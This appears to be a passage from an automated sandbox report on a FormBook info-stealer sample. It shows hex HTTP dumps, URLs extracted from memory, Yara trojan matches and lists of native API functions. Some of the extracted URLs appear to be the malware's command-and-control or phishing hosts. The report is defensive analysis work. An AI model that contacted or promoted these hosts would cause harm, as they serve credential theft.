6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:38 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1714X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: indent PWS-020199.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: indent PWS-020199.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: indent PWS-020199.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: indent PWS-020199.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eylmpwjot.store
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eylmpwjot.store/3mcu/
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netiougc.exe, 00000007.00000003.2203335794.0000000008185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: indent PWS-020199.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: firefox.exe, 0000000A.00000002.2311704116.0000000002776000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.mareomnia.com/ya74/?dBOL8fg=

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0042B3B3 NtClose,2_2_0042B3B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2B60 NtClose,LdrInitializeThunk,2_2_014F2B60
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_014F2DF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_014F2C70
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F35C0 NtCreateMutant,LdrInitializeThunk,2_2_014F35C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F4340 NtSetContextThread,2_2_014F4340
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F4650 NtSuspendThread,2_2_014F4650
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2BE0 NtQueryValueKey,2_2_014F2BE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2BF0 NtAllocateVirtualMemory,2_2_014F2BF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2B80 NtQueryInformationFile,2_2_014F2B80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2BA0 NtEnumerateValueKey,2_2_014F2BA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2AD0 NtReadFile,2_2_014F2AD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2AF0 NtWriteFile,2_2_014F2AF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2AB0 NtWaitForSingleObject,2_2_014F2AB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2D00 NtSetInformationFile,2_2_014F2D00
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2D10 NtMapViewOfSection,2_2_014F2D10
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2D30 NtUnmapViewOfSection,2_2_014F2D30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2DD0 NtDelayExecution,2_2_014F2DD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2DB0 NtEnumerateKey,2_2_014F2DB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2C60 NtCreateKey,2_2_014F2C60
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2C00 NtQueryInformationProcess,2_2_014F2C00
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2CC0 NtQueryVirtualMemory,2_2_014F2CC0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2CF0 NtOpenProcess,2_2_014F2CF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2CA0 NtQueryInformationToken,2_2_014F2CA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2F60 NtCreateProcessEx,2_2_014F2F60
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2F30 NtCreateSection,2_2_014F2F30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2FE0 NtCreateFile,2_2_014F2FE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2F90 NtProtectVirtualMemory,2_2_014F2F90
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2FA0 NtQuerySection,2_2_014F2FA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2FB0 NtResumeThread,2_2_014F2FB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2E30 NtWriteVirtualMemory,2_2_014F2E30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2EE0 NtQueueApcThread,2_2_014F2EE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2E80 NtReadVirtualMemory,2_2_014F2E80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2EA0 NtAdjustPrivilegesToken,2_2_014F2EA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3010 NtOpenDirectoryObject,2_2_014F3010
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3090 NtSetValueKey,2_2_014F3090
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F39B0 NtGetContextThread,2_2_014F39B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3D70 NtOpenThread,2_2_014F3D70
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3D10 NtOpenProcessToken,2_2_014F3D10
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A24340 NtSetContextThread,LdrInitializeThunk,7_2_03A24340
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A24650 NtSuspendThread,LdrInitializeThunk,7_2_03A24650
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03A22BA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03A22BE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03A22BF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22B60 NtClose,LdrInitializeThunk,7_2_03A22B60
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22AF0 NtWriteFile,LdrInitializeThunk,7_2_03A22AF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22AD0 NtReadFile,LdrInitializeThunk,7_2_03A22AD0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22FB0 NtResumeThread,LdrInitializeThunk,7_2_03A22FB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22FE0 NtCreateFile,LdrInitializeThunk,7_2_03A22FE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22F30 NtCreateSection,LdrInitializeThunk,7_2_03A22F30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03A22E80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03A22EE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03A22DF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22DD0 NtDelayExecution,LdrInitializeThunk,7_2_03A22DD0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03A22D30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03A22D10
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03A22CA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22C60 NtCreateKey,LdrInitializeThunk,7_2_03A22C60
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03A22C70
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A235C0 NtCreateMutant,LdrInitializeThunk,7_2_03A235C0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A239B0 NtGetContextThread,LdrInitializeThunk,7_2_03A239B0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22B80 NtQueryInformationFile,7_2_03A22B80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22AB0 NtWaitForSingleObject,7_2_03A22AB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22FA0 NtQuerySection,7_2_03A22FA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22F90 NtProtectVirtualMemory,7_2_03A22F90
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22F60 NtCreateProcessEx,7_2_03A22F60
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22EA0 NtAdjustPrivilegesToken,7_2_03A22EA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22E30 NtWriteVirtualMemory,7_2_03A22E30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22DB0 NtEnumerateKey,7_2_03A22DB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22D00 NtSetInformationFile,7_2_03A22D00
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22CF0 NtOpenProcess,7_2_03A22CF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22CC0 NtQueryVirtualMemory,7_2_03A22CC0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22C00 NtQueryInformationProcess,7_2_03A22C00
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23090 NtSetValueKey,7_2_03A23090
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23010 NtOpenDirectoryObject,7_2_03A23010
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23D10 NtOpenProcessToken,7_2_03A23D10
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23D70 NtOpenThread,7_2_03A23D70
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03238240 NtAllocateVirtualMemory,7_2_03238240
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03238060 NtDeleteFile,7_2_03238060
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_032380F0 NtClose,7_2_032380F0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03237F80 NtReadFile,7_2_03237F80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03237E20 NtCreateFile,7_2_03237E20
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 0_2_01A1D4440_2_01A1D444
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 0_2_03374FF80_2_03374FF8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 0_2_033716680_2_03371668
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 0_2_033716580_2_03371658
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 0_2_03370D900_2_03370D90
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004030202_2_00403020
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004100832_2_00410083
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040E1032_2_0040E103
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004021902_2_00402190
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004012002_2_00401200
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00402AF02_2_00402AF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004023202_2_00402320
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004025502_2_00402550
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040FE632_2_0040FE63
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0042D7F32_2_0042D7F3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004167F32_2_004167F3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015481582_2_01548158
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B01002_2_014B0100
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155A1182_2_0155A118
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015781CC2_2_015781CC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015801AA2_2_015801AA
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015741A22_2_015741A2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015520002_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157A3522_2_0157A352
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE3F02_2_014CE3F0
